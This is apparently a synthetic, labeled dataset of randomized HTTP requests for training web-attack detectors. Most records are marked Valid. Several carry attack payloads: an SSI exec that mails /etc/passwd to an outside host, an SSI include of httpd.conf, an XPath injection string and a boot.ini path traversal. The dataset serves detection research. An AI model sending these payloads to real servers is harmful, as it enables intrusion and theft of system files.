Trailer: Proxy-Authorization
User-Agent: hEteDphem/6.4.3.6.0
UA-CPU: Sparc
UA-Disp: 2675,465,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 620x373
Via: FTP/9.9 226.240.89.0, FTP/2.0 57.104.159.122:4060, 5.1 www.gmo15ht.html
Transfer-Encoding: deflate
Upgrade: Sbhjos/1.1
Warning: 710 163.232.225.18 "glcasie34ee" 
X-Forwarded-For: 213.3.252.110
X-Serial-Number: 82627
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2812
Start - Id: 26146
class: Valid
GET /cia8aratAlel7d4/MS/4Ds6J1/feitoghaLsrel/kiwvh8d/rodondndoisEtRf/eZJboot.iniPFgmail7/seilusi47gn5ye/rQ@2S%uE/mG4eufautoexecV@7hnetcatN3.jpeg?nOeuct=a%3C&tonrHtyehhh=aiW3&fowhtbWenslEpol=8162&Ode5aiao=63210573&A5E9Nyxo=tgzoseailestdin3rnyaorl&nnin=eIc3saoiHP&xiduaih4e=4&ncaarndi9=50095772&soae=x1mWeeb%3Betc7&hsodtOoiqr=erxesrd%26arrf&vxg=iqoah HTTP/1.0
Host: www.zrtnooi.st
Connection: close
Accept: application/*;q=0.2, image/*;q=0.9, audio/x-wav
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: masa-cpt;q=0.8, nhsc-unoaaoee
Cache-Control: only-if-cached
Client-ip: 239.116.234.200
Cookie: tTrjet=ccMca;eShnull=d&t qbgrebnsals;fiyqwdropxt=r2k;hednhlel5Eoo=8;stlmh=16627941
Cookie2: $Version="957"
Date: Thu, 28 Jul 05 18:56:43 GMT
ETag: W/"APhYenWjVHyPtzW"
Expect: 100-continue
From: ee3px@e09zV.net
If-Modified-Since: Tue, 31 Mar 09 13:19:23 CET
If-Unmodified-Since: Mon, 21 Jul 08 07:26:50 UTC
If-Match: "p.D.XghU5AYoUU5XajnI"
If-None-Match: "24tO5ZciPK2KPOqqq7pQ"
If-Range: Sun, 13 Jun 04 14:49:45 GMT
Max-Forwards: 6
MIME-Version: 4.2
Pragma: no-cache
Proxy-Authorization: NTLM ZXN0MmVvbjBzdGlhbGwxbWNvQTUybmVsSWVlNWx0ZWllZWlWYWFsbnNicG8=
Authorization: NTLM c2hpbmN0aGl1bGl3QnRzdmFtaWVlSWkwd2Z1ZGRUcm5i
Range: 4-,78725-,-95
Referer: /nytat.mspx
TE: chunked,trailers,trailers
Trailer: Warning
User-Agent: aatutdtaaTq
UA-CPU: Sparc
UA-Disp: 8220,770,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 7580x3767
Via: FTP/6.5 98.40.95.110, 5.8 119.187.185.241
Transfer-Encoding: deflate
Upgrade: gefl/7.1, lhm/3.4, crto/0.1, lwu/3.1
Warning: 460 www.e8eat.css "ytmirwcil" 
X-Forwarded-For: 212.197.71.231
X-Serial-Number: 44759103360851284549
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26146
Start - Id: 39739
class: SSI
GET /Go2@VGVkyJ/tTtdetidghwDxyf.asp?kphlmNlypec=%3C%21--+++++%23include+virtual%3D%22%2Fetc%2Fhttpd%2Fhttpd.conf%22--%3E&iarosrnftrdoo=14370225 HTTP/1.1
Host: www.Rpehda.fr
Connection: secA
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: identity
Accept-Language: d-r7a4;q=0.6, iR-Hor;q=0.5, hess-tit5, 9dp-j
Cache-Control: min-fresh=7
Client-ip: 127.62.226.109
Cookie: ttss2ieuh=lggtrnn:d62;eN8osushtzqt=50522
Cookie2: $Version="7"
Date: Tue, 12 Apr 05 07:28:01 GMT
ETag: "tYCCtqQXAuY.j2b@k7Gs"
Expect: 100-continue
From: n4tbla@ol8e.st
If-Modified-Since: Thu, 09 Feb 06 12:23:12 UTC
If-Unmodified-Since: Fri, 23 May 08 16:48:19 CET
If-Match: "3y6Fcc-W@ilXEcQNbt14"
If-None-Match: "IMbk9v5bk526Uw4..y5"
If-Range: *
Max-Forwards: 539
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Ilaaw 1hcnv=r7t63
Range: -58,-7,-12255
Referer: http://esoh.ch/i8amtUm/n8acfeo.jsp
TE: deflate
Trailer: Host
User-Agent: lMaXbVHa http://www.a9Ashlub.com
UA-CPU: Sparc
UA-Disp: 1946,7252,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 930x2188
Via: 8.7 31.3.176.208, pdt3i5/7.2 12.54.88.254, 1.8 222.255.101.54
Transfer-Encoding: compress
Upgrade: dhHa/1.3, bqt/4.5, per/1.9, eoto/7.1, xle/6.5
Warning: 957 www.4Ggtd.jpg "toiUl7sojbevrsrhed" 
X-Forwarded-For: 51.221.13.87
X-Serial-Number: 43717297958345
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 39739
Start - Id: 14867
class: Valid
GET /9dkifIee/agnr0k/c-1NSwVGih/svgOY7Zv/feieb5atn1oenItu/ohbq0abBmZB5X@4/oAiusa2scUnAlPr/rgu/acceptiv/itOnIehnee/_LCU5VQ@NM_8Q/nsrk.swf?Nto=ooasabkoi2&ww6ijroogam=glr6Lnfjahioizole&fo=634&h1el8loseeRa=5882191&Eilaih0iiicsnr=ade+enwinntdIi%3FchildttjgAcm&@fcPPiygOD=we&DZFW=eae&etEvhCsOedsrwe=sSiSD2&6ZF2NavpK=230&nrto=306&N9-AsystemqmailXABm=+tb HTTP/1.0
Host: 136.193.182.253
Connection: ttrlrs
Accept: */*;q=0.7
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: max-age=203
Client-ip: 138.69.215.50
Cookie: m1fhnoydU7Iyeo=85
Cookie2: $Version="76"
Date: Sat, 01 Mar 08 13:17:23 CET
ETag: W/"7Ww2LqRBAnXCQUCD93"
Expect: 6n8e
From: dtayi7@nIdTra.gov
If-Modified-Since: Tue, 11 May 04 02:02:59 UTC
If-Unmodified-Since: Thu, 24 Sep 09 10:10:32 UTC
If-Match: "ilJTogxwmcsuusht7ha8"
If-None-Match: "A@i7kQEB8.J8wN0G"
If-Range: *
Max-Forwards: 668
MIME-Version: 4.3
Pragma: no-cache
Proxy-Authorization: Basic dGxuYXQ6dDd2T2lyZQ==
Authorization: Basic NGFodFJvbjpUaXNpM08=
Range: -43,-61335,692292-223
Referer: http://cjwtf.net/pHanfr/uondeSoo.mspx
TE: trailers
Trailer: Referer
User-Agent: 4ema5et2och2
UA-CPU: Sparc
UA-Disp: 872,888,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 923x8805
Via: HTTP/7.2 172.172.205.26, HTTP/8.3 www.zheRas.tiff
Transfer-Encoding: gzip
Upgrade: titwo/7.7
Warning: 225 184.210.143.62:77965 "ecfsd0heehezcle" "Sat, 24 Feb 07 14:16:26 UTC"
X-Forwarded-For: 121.34.208.174
X-Serial-Number: 883982110
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 14867
Start - Id: 40152
class: SSI
GET /olhvJF@8L132w23vi/nnA0owetIait/wxn@4zFi/sNbD@/waeecaEa1wge7ubctt/lO/aipoFw.exe?2httqiz6=aderNgsitarn&guw=985997&iuhrhynClnpanpm=seU&esshNexm7w=7&uyunxqtTstre8=eHnq.61&z2nome1aw=o9pe2l0Xo&oYaoeRen2urauoi=st%27group+byqn&odMlt05hogS=passthru5xmlca&eOivehrbappr3n=iI-0G5&Mol5sat9nu=SnArn&etea0qody9tshon=ftro8eethReeennnta&jhdlzoe=%3C%21--++++%23exec++cmd%3D%22%2Fbin%2Fmail++++onteeIs4.com+++%3C++++%2Fetc%2Fpasswd%22--%3E&i8gon=t2isqiemlectioaeh&buxy=4home HTTP/1.0
Host: 198.70.32.210:33
Connection: osrdis
Accept: */*
Accept-Charset: windows-1250;q=0.8, koi8-r, windows-1253;q=0.4, x-mac-arabic
Accept-Encoding: *;q=0.3
Accept-Language: m7rant-ancu6, I-l
Cache-Control: no-store
Client-ip: 162.23.69.58
Cookie: Ir=4372;t9e=6745644;6iosedoe=pnh6e
Cookie2: $Version="247"
Date: Mon, 30 Jul 07 22:07:06 GMT
ETag: "qmJ@VE5bg4LWn_pk"
Expect: t3ettda=ktisluei;iw3hm
From: stce@ygsk.st
If-Modified-Since: Sat, 05 Sep 09 20:19:26 CET
If-Unmodified-Since: Wed, 05 May 10 01:20:33 GMT
If-Match: *
If-None-Match: *
If-Range: "xVrPC8A0zxEfnwkZ2J"
Max-Forwards: 2
MIME-Version: 5.9
Pragma: rc=o
Proxy-Authorization: NTLM Z3RhdW90YWpuN2NoYWdhZWUwaG1zcmV0ZkFpZWx0cmVkdDV0
Authorization: Digest qop=auth
Range: 563-54,0904-,88598-0
Referer: http://loMas.com/rsneh/ntadmmj/2tpalyc.shtml
TE: trailers,chunked
Trailer: Warning
User-Agent: Mozilla/4.8 (Windows; U; Win 9x 1.0; rx-to; rv:3.1.0) Gecko/91799564
UA-CPU: MIPS
UA-Disp: 832,4615,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 427x7361
Via: 3.3 www.aeirt.tiff, Avinhe/0.1 www.t1kena.shtml:24, 6.4 www.qwfs.js:9
Transfer-Encoding: gzip
Upgrade: llr4iH/0.1, ihexp3/7.5, 4cG/7.6, txi/6.5
Warning: 295 www.rsfxckr.tiff "hYSe8lwzauon" "Sat, 27 May 06 19:07:23 CET"
X-Forwarded-For: 73.204.141.133
X-Serial-Number: 014833432
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40152
Start - Id: 4268
class: Valid
PUT /jLhGr5hXzQpM3qMsRYg/LUhBew2s/l-b8lF9Vf5zgax/n_IqW9UMM9qWrkc6OWz/tOd7mX.p7xoC.1Gjg.jpg? HTTP/1.0
Content-Length: 36
Content-Language: s
Content-Encoding: compress
Content-Location: /Efoiayew/9ogSsa/i8rl/9h9l.cgi
Content-MD5: ZXRLZWFlYXczb3BlbWFyTg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 11 Jun 08 24:05:31 GMT
Last-Modified: Wed, 28 Jan 04 16:26:11 CET
Host: www.NoohqorEgr.cz
Connection: lrbl
Accept: text/*
Accept-Charset: *
Accept-Encoding: *;q=0.4
Accept-Language: *
Cache-Control: no-store
Client-ip: 247.55.250.216
Cookie: daptprntipsnRa0=xHDhT;rlki=hoLotlkeiwTtlpa;ihpdrqleoe=27254798;znygcpa53ls=msu;aeq=feae
Cookie2: $Version="11"
Date: Wed, 14 Jan 04 11:46:49 CET
ETag: W/"5c.TDeR9V14DaeTh"
Expect: 100-continue
From: wyu3E1ro@Eisyttae.cz
If-Modified-Since: Thu, 11 May 06 04:55:06 UTC
If-Unmodified-Since: Sun, 26 Sep 04 02:14:30 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 04 Nov 09 13:43:19 UTC
Max-Forwards: 38
MIME-Version: 0.2
Pragma: hrautCtn='ahbb'
Proxy-Authorization: Basic MnBJbm1EOnR4b3R4NjE=
Authorization: NTLM ZTRhYXRlc2tvdW40cHVhNXRCZmhtenRldGFhaWFnd2xudGFtYXV5Mnlob255aXM=
Range: 5-,-24662,-855
Referer: http://e7EL.st/ntasuxly/nhsei/tfne5l.doc
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/0.0 (Windows; U; Win98 8.9; yn-9i; rv:6.0.2) Gecko/20336874
UA-CPU: StrongARM
UA-Disp: 9274,388,8
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 193x5257
Via: FTP/1.2 www.iaux5E.jpg, 4.4 www.tlEhtwa.tiff
Transfer-Encoding: identity
Upgrade: Unh/4.4
Warning: 529 www.eedpOe9e.css "dilAc6" 
X-Forwarded-For: 49.153.10.138
X-Serial-Number: 62285156998436291420
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

y1czusswnTSref=870958&saneoos5wLp=hy

End - Id: 4268
Start - Id: 14492
class: Valid
GET /tvKl.u4jN/cdi/vd1OQIHposition/nqNcrhanRedOUsrGrgbp/n72/aVV9R41jjmX.aspx? HTTP/1.1
Host: 69.60.94.163
Connection: keep-alive
Accept: application/x-tar, audio/basic
Accept-Charset: euc-cn;q=0.9, iso-8859-8;q=0.9, windows-1257;q=0.5
Accept-Encoding: *
Accept-Language: ye-bga9a
Cache-Control: max-age=9
Client-ip: 156.195.173.2
Cookie: q7Ghco=nih;30sm=52416403
Cookie2: $Version="838"
Date: Sat, 30 Jan 10 16:12:10 UTC
ETag: "fQBb1ktCDdUr54GpFU"
Expect: ulijiif
From: utt4e4@eaLhafx.uk
If-Modified-Since: Wed, 25 Aug 04 23:43:22 GMT
If-Unmodified-Since: Mon, 18 May 09 15:39:40 GMT
If-Match: *
If-None-Match: "lpiWsGheC-4CrFXC"
If-Range: *
Max-Forwards: 06
MIME-Version: 5.2
Pragma: nxtn='e9tiot'
Proxy-Authorization: Digest cnonce="2tl6"
Authorization: n0mr 3Ethitaq=yejS
Range: 737195-
Referer: /s0uqa/leiaeeb/nesi/4wypnye.txt
TE: chunked;q=0.6
Trailer: From
User-Agent: ezeeenzsom/1.3
UA-CPU: StrongARM
UA-Disp: 866,9515,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 2304x0310
Via: 5.7 105.222.53.248, FTP/6.7 82.100.58.28
Transfer-Encoding: identity
Upgrade: aha/1.7, himts/1.6, uNp/7.6, Grw/1.1, Etd/1.9
Warning: 474 www.anislbri.html "nTdethnvs" 
X-Forwarded-For: 33.83.28.62
X-Serial-Number: 58967727839058915929
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 14492
Start - Id: 23679
class: Valid
GET /fA7ggqAYzH-Mi4nyCdsb/Db/9klxp_3jWdgmz.bin? HTTP/1.0
Host: www.rocmeeAa.com:80
Connection: close
Accept: audio/basic
Accept-Charset: euc-tw;q=0.9, x-mac-chinesesimp, us-ascii
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 11.157.68.9
Cookie: J0eiM=dscripti;wD0Z=dmailaa;02saoou8=t7VVfURl;ftttno0tbs=vLn@PezsWR;oelegeaocO=R-0snf
Cookie2: $Version="37"
Date: Wed, 05 Aug 09 03:54:55 CET
ETag: "_-.owMW@XH@iS7SkUs"
Expect: hotxeoT=ssSrx
From: lanon@fBeece5si.gov
If-Modified-Since: Wed, 22 Jun 05 13:02:23 GMT
If-Unmodified-Since: Sun, 27 Jun 04 13:56:25 UTC
If-Match: "uclM3f8eD1w-Keri"
If-None-Match: "H.9SdXk@yL00OKfq."
If-Range: *
Max-Forwards: 53
MIME-Version: 0.9
Pragma: baaotp=q
Proxy-Authorization: Digest uri=/c3Km.msf
Authorization: Digest nc=fd42A60A
Range: 39769-5373,359385-
Referer: /gouge/is5wo/uiue8/mlaelB.cgi
TE: deflate,trailers
Trailer: From
User-Agent: ohtite/1.6
UA-CPU: 68000
UA-Disp: 941,326,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 961x2992
Via: 0.5 242.144.126.127, HTTP/4.5 www.sSioah7.htm
Transfer-Encoding: identity
Upgrade: 85ipnt/6.3, atout/3.2
Warning: 159 www.ln7i.css:8318 "dimqctttnoleuwluEe" "Thu, 08 Feb 07 23:50:07 CET"
X-Forwarded-For: 11.1.75.209
X-Serial-Number: 13224
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 23679
Start - Id: 48647
class: XPathInjection
POST /iG_qXl1rf0C/nminy54yfgsoeuah/whereh@s/mh59enoieEnirnr/mqLhJu870xM3/oK.swf? HTTP/1.1
Content-Length: 119
Content-Language: sea9i,d
Content-Encoding: deflate
Content-Location: http://www.8rnm.com/s6or/sevoAwd/lmooidp.php3
Content-MD5: eXRybkVjNnRhaGhtclN0dA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 25 Dec 07 04:29:17 CET
Last-Modified: Sat, 14 Oct 06 05:18:11 CET
Host: 167.150.134.15:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: iso-8859-4;q=0.5, iso-8859-8, euc-tw
Accept-Encoding: *;q=0.4
Accept-Language: taeww8fx-4Qcs8;q=0.6, gssolnaD-ersaea;q=0.5
Cache-Control: only-if-cached
Client-ip: 199.50.13.246
Cookie: nel=rnvt26g;G6Ew=205438;euit2=2783374
Cookie2: $Version="353"
Date: Fri, 21 Dec 07 07:35:14 GMT
ETag: W/"xQ73VO@JK@4R4B4"
Expect: br0Qn
From: eta3@rewxn.biz
If-Modified-Since: Tue, 12 Feb 08 09:14:37 UTC
If-Unmodified-Since: Sun, 31 Dec 06 23:38:06 UTC
If-Match: "sJecmBHBknBckAN3Ivo"
If-None-Match: "etZty1Mvx6yWfzC"
If-Range: Sun, 05 Apr 09 10:23:32 GMT
Max-Forwards: 4
MIME-Version: 7.3
Pragma: httinte9='sk3omm'
Proxy-Authorization: NTLM cXRhYXRucm5EaTR0cGR2b2ZubGZlYXR5c3Vob3R0ZWlzZVJvbHMydA==
Authorization: Digest nc=FF568b5A
Range: -046912,8351-4,007308-22
Referer: http://e5Rniuu.org/Ngbth.asp
TE: gzip;q=0.1,trailers
Trailer: Warning
User-Agent: Mozilla/2.8 (Machintosh; U; PPC 7.0; gn-af; rv:9.1.2) Gecko/04592906
UA-CPU: x86
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: FTP/9.8 171.243.31.230
Transfer-Encoding: hAgbh
Upgrade: 4iiutb/0.5, Iima/4.6, uhhmar/1.8, nmohS/4.1, tm3A/2.3
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 36007
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

egoMehitn=846858&XAP@R=gr1c'    or   path/child::node()[position()=N]    or    'xc3u'=  '

End - Id: 48647
Start - Id: 27449
class: Valid
GET /mailsystemI78.V/cxn9f2tmAlai/anizeThcLe45iastN.tiff? HTTP/1.1
Host: www.qLwiyu8.biz
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: max-age=78
Client-ip: 213.169.24.78
Cookie: EoIiHrv1t=s4EetaolE%bateo;Thahoc5asitXhd=2775842;Zowhht9bT=jL ore|vrohtpassoi;yW6ocqmf=iq%unnlwgetjdiifceupdateiaer;E4o0to=l7Wb
Cookie2: $Version="3"
Date: Thu, 08 Jul 04 04:33:09 GMT
ETag: W/"H.wPWoYeJYgMrTAy3"
Expect: coouoR
From: nt7minop@lhace.uk
If-Modified-Since: Wed, 08 Jun 05 11:06:39 UTC
If-Unmodified-Since: Sat, 02 Feb 08 11:43:24 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 19 Aug 06 19:14:46 UTC
Max-Forwards: 84
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Basic NmVvclY6c3l0NA==
Authorization: Digest username="am7A"
Range: 3-125487,329-
Referer: /uoEh/hueeA/ntEroB.msf
TE: trailers,trailers
Trailer: If-Match
User-Agent: Mozilla/0.2 (Windows; U; Windows NT 1.0; sn-tm; rv:9.7.5) Gecko/40327559
UA-CPU: StrongARM
UA-Disp: 2797,148,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 802x162
Via: HTTP/3.3 www.Icbcdqh7.css, 5fnp/9.4 247.190.36.225, ethh/8.4 77.151.45.51:3
Transfer-Encoding: Czatb
Upgrade: Srw8/3.1, wsbR/3.3, kiqo7/4.6, oilzes/0.4, abeat/7.3
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 71071615969288398
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27449
Start - Id: 9076
class: Valid
GET /WSXU/agOqFwcaY/0mCP_/uuqP6xbinA/elavloearwes8i8aoi/my/sauSa4/wk8/ol/1nCn0cwcdvpLchcel.exe? HTTP/1.0
Host: www.rnYhdqdte.cz
Connection: cleS
Accept: application/*;q=0.8
Accept-Charset: iso-10646-ucs-2
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 207.28.5.68
Cookie: utermegl3PUsux= ih;ewhir=cMZ-rTpKoL;wn=lDe>tRi1tnt-tmd ;sea7ef3rsm=8808914;emdqoStmgts=sdm
Cookie2: $Version="4"
Date: Fri, 03 Aug 07 18:07:28 UTC
ETag: W/"3l9qrxDIQubeQZBIZ"
Expect: 100-continue
From: riunul@rssjpw.cz
If-Modified-Since: Mon, 15 Feb 10 18:21:42 GMT
If-Unmodified-Since: Tue, 14 Jun 05 06:09:04 UTC
If-Match: "8y8gIIjwLjyMqlwIk"
If-None-Match: "pN4TqxXG4xAr1Ngq"
If-Range: ".fKVG@WaBGLdiUbFU_O"
Max-Forwards: 92
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZW5pZGlub3N0YWVuYUVieW5iYmhybmNXbXdvdGJLc3NhZXM=
Authorization: NTLM aWhyY3lvYmltdGVjN3J6NWFvaWxlNW9DY2lvc2NndHVyZWVl
Range: -003877,64218-4,-17
Referer: /imgs3.pl
TE: trailers
Trailer: If-Modified-Since
User-Agent: ngeosuoh
UA-CPU: Sparc
UA-Disp: 6130,9479,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 010x4467
Via: HTTP/3.9 198.194.132.242, FTP/9.0 82.202.106.135
Transfer-Encoding: AemvaE
Upgrade: nqs/6.0, nEtzdl/8.3, shoO/3.9, eystl9/7.4, wxah/2.3
Warning: 991 177.26.146.73 "etpo8OtaAfvisutud9o" "Tue, 12 Dec 06 02:41:54 UTC"
X-Forwarded-For: 44.108.222.96
X-Serial-Number: 442361
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 9076
Start - Id: 16453
class: Valid
GET /oee.dll?csa2uAcaseybsur=rs HTTP/1.1
Host: 152.105.43.250
Connection: keep-alive
Accept: application/*, application/*
Accept-Charset: windows-1255;q=0.5
Accept-Encoding: *;q=0.3
Accept-Language: bod96x-e;q=0.8, 1r5ioafo-Eneh, y1-ipaTe;q=0.7
Cache-Control: r=ei
Client-ip: 165.56.112.131
Cookie: oule=ta;2ut=awblm;dlerzErTd=sjte-?IbeEm0
Cookie2: $Version="9"
Date: Mon, 19 Jul 04 17:07:18 CET
ETag: W/"VhmJ3hFe1CQ3fFu"
Expect: 100-continue
From: htpnou7@zrU4oar.org
If-Modified-Since: Sat, 03 Jun 06 20:49:44 UTC
If-Unmodified-Since: Sun, 12 Apr 09 06:00:26 UTC
If-Match: "hHWy2nKAZcn.0LMlp1l"
If-None-Match: *
If-Range: Sun, 22 Feb 04 17:11:51 CET
Max-Forwards: 539
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: Basic dG4wczpzbG9hZw==
Authorization: Digest response="d4EDaEF673D402ce9bedCdEA85e716a4"
Range: -4,1-
Referer: http://ocT0e2k.biz/raemns.php3
TE: deflate;q=0.0
Trailer: Accept
User-Agent: Mozilla/8.4 (X11; U; Open BSD i586 3.9; hC-sL; rv:2.1.6) Gecko/74614647
UA-CPU: StrongARM
UA-Disp: 097,580,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 4066x2541
Via: n6el/4.3 www.o9Ideo.htm, 0.5 www.Kw4ntI.shtml
Transfer-Encoding: whjy; 6c0dhrn=lnyga
Upgrade: hrts/1.5, ocenff/3.9, hafw/0.7, whsmet/4.1
Warning: 398 www.bi0vAerr.tiff:59 "o6sDp9ta" "Sun, 19 Jun 05 14:33:21 UTC"
X-Forwarded-For: 242.120.138.182
X-Serial-Number: 3885571205
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16453
Start - Id: 45462
class: PathTransversal
GET /lEt8ouzhEfillN/u@2Y7/apnifdeeaalt/djqlLenetneBfchah/8D5/cegaacaP52eobozviif/eoseAao98straosnhn/uoe01.css?keoe=%2Fm%28t5+de&us=3hd3n&not1paeeeil=hN--DMao0Jb&w13sbweeobi=30639338&qmioonT=enielo&ue=f%3A%5Cwindows%5Cboot.ini HTTP/1.0
Host: www.4ehoopf.st
Connection: close
Accept: */*
Accept-Charset: iso-8859-3, big5, euc-jp
Accept-Encoding: *
Accept-Language: *
Cache-Control: y6kw1e='aooi'
Client-ip: 39.180.100.162
Cookie: ieont=elaqntnHtmnb;ujwenciacns=etjia8eehrT0Ltn;fYqAmetaPJb3n9s=o2s;srniTamIexdx=nbb6j;lgfmtektiD=rS3qg;uN=0h
Cookie2: $Version="91"
Date: Wed, 12 Nov 08 03:48:30 UTC
ETag: "MWQpBPOD6G9PQ6YY5D"
Expect: 100-continue
From: eso4Aae@o0ky0.it
If-Modified-Since: Mon, 19 Jan 04 13:39:38 UTC
If-Unmodified-Since: Fri, 13 Feb 09 07:09:24 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Sep 07 20:30:10 CET
Max-Forwards: 19
Pragma: no-cache
Proxy-Authorization: Basic bnRhV29yaXQ6c2Rhcg==
Authorization: ianw cFnsazM=HpFt
Range: -23,7962-,63876-540949
Referer: http://www.eqb1.com/8Jpomb.mspx
TE: trailers,deflate;q=0.8
Trailer: Host
User-Agent: Mozilla/1.2 (Machintosh; U; PPC 4.0; ef-7i; rv:5.7.4) Gecko/21915344
UA-CPU: Sparc
UA-Disp: 1778,2316,8
UA-OS: Win9x
UA-Color: color8
Via: Ehles/8.4 www.ft17.tiff, HTTP/5.3 www.FTri.css
Transfer-Encoding: deflate
Upgrade: dotvf/0.0, efio7/3.4
Warning: 398 216.136.8.238 "ivry" 
X-Forwarded-For: 93.18.219.115
X-Serial-Number: 347804024892974921
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45462
Start - Id: 5567
class: Valid
POST /teooH/Od.gif? HTTP/1.1
Content-Length: 57
Content-Language: di
Content-Encoding: compress
Content-Location: /rtUycrr/ystsu/tsaa/fteeHu/gSsi.cfm
Content-MD5: bDFnZXB0dHJpZWF0cmM2VA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 10 Nov 05 13:23:32 GMT
Last-Modified: Fri, 11 Jan 08 13:07:25 CET
Host: www.tbsc.de
Connection: close
Accept: video/mpeg
Accept-Charset: x-mac-arabic;q=0.3, x-mac-cyrillic, iso-8859-7;q=0.0, x-mac-hebrew;q=0.1, euc-cn
Accept-Encoding: compress, compress
Accept-Language: ti-t;q=0.6, o-dt, lepgbe-taorG
Cache-Control: no-store
Client-ip: 162.107.11.157
Cookie: aopdxcshnmTu=isdechieeetp;Azdthp=423892;4r9M614jH=as2X;nreRh6nn=uI;eec=018
Cookie2: $Version="811"
Date: Sat, 17 Jul 04 03:58:20 GMT
ETag: "jRNNrlKSM.X966cv"
Expect: 100-continue
From: ddE5mq0u@tano2i.be
If-Modified-Since: Wed, 08 Aug 07 03:08:33 UTC
If-Unmodified-Since: Tue, 10 Jan 06 18:33:39 CET
If-Match: "KlcqpPxg59s5fCY"
If-None-Match: *
If-Range: "sG76yTO7APoQr2WgKZhl"
Max-Forwards: 5
MIME-Version: 4.5
Pragma: qtgnd='tirDeiI'
Proxy-Authorization: Digest realm
Authorization: NTLM dWFtdWx3aGt0dHNodDllZXNldFMyd21nbmViaGM0b21lc2V0c2Vm
Range: -97243,-59
Referer: /9d7i5v7t.tar
TE: deflate
Trailer: If-Match
User-Agent: lrOAO9p http://www.0neetBcp.st
UA-CPU: x86
UA-Disp: 266,600,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 6340x801
Via: 3.2 www.veeas.htm, HTTP/1.1 37.231.76.66, 7.8 231.12.23.124
Transfer-Encoding: reftes
Upgrade: 4rlr/0.3, gsobha/3.9, R5tyi8/0.2
Warning: 189 www.tsXitt6.gif "8U5tatshea" 
X-Forwarded-For: 26.9.191.248
X-Serial-Number: 504491792
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

loybfehiaoitm=711805&lreigan3ieazmh=58867759&zoadptecha=2

End - Id: 5567
Start - Id: 621
class: Valid
GET /sBNhlit/twno5rum/elimr563izrhvaae/nsrbyp3ttrIyt9spvu/lblntedsulstbdeyEaqt.shtml? HTTP/1.1
Host: www.0as1aiaey.net:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.6, compress;q=0.4, deflate;q=0.3, deflate;q=0.3
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 178.198.248.128
Cookie: 5shpSEBIE=4cHd5zsnen~q;6eeoodfedAi=qicr;7xwd9nj=5314;te=484;vs=hi kmailt;aosQis=43
Cookie2: $Version="15"
Date: Tue, 16 Mar 04 19:33:17 CET
ETag: "MI0nPVCyGL2S@fDb5aMc"
Expect: 100-continue
From: ystebe@hnBteRt6v.be
If-Modified-Since: Mon, 13 Sep 04 18:31:59 GMT
If-Unmodified-Since: Wed, 14 Feb 07 12:54:33 CET
If-Match: "YpaHbvm8hWI8hvBwhXb"
If-None-Match: *
If-Range: "3-Ef-e.ea0tVc.m.E9j"
Max-Forwards: 3
MIME-Version: 0.4
Pragma: 3yhoeeAt=fdeq
Proxy-Authorization: NTLM all0bmFoaXVuYWNhYW9yNG8xYXdFbnJ0YXloNXNhT3NyYmFCb2VleXQ=
Authorization: adtt eyl5SoOc=tf8g7i
Range: 0-,76-659886
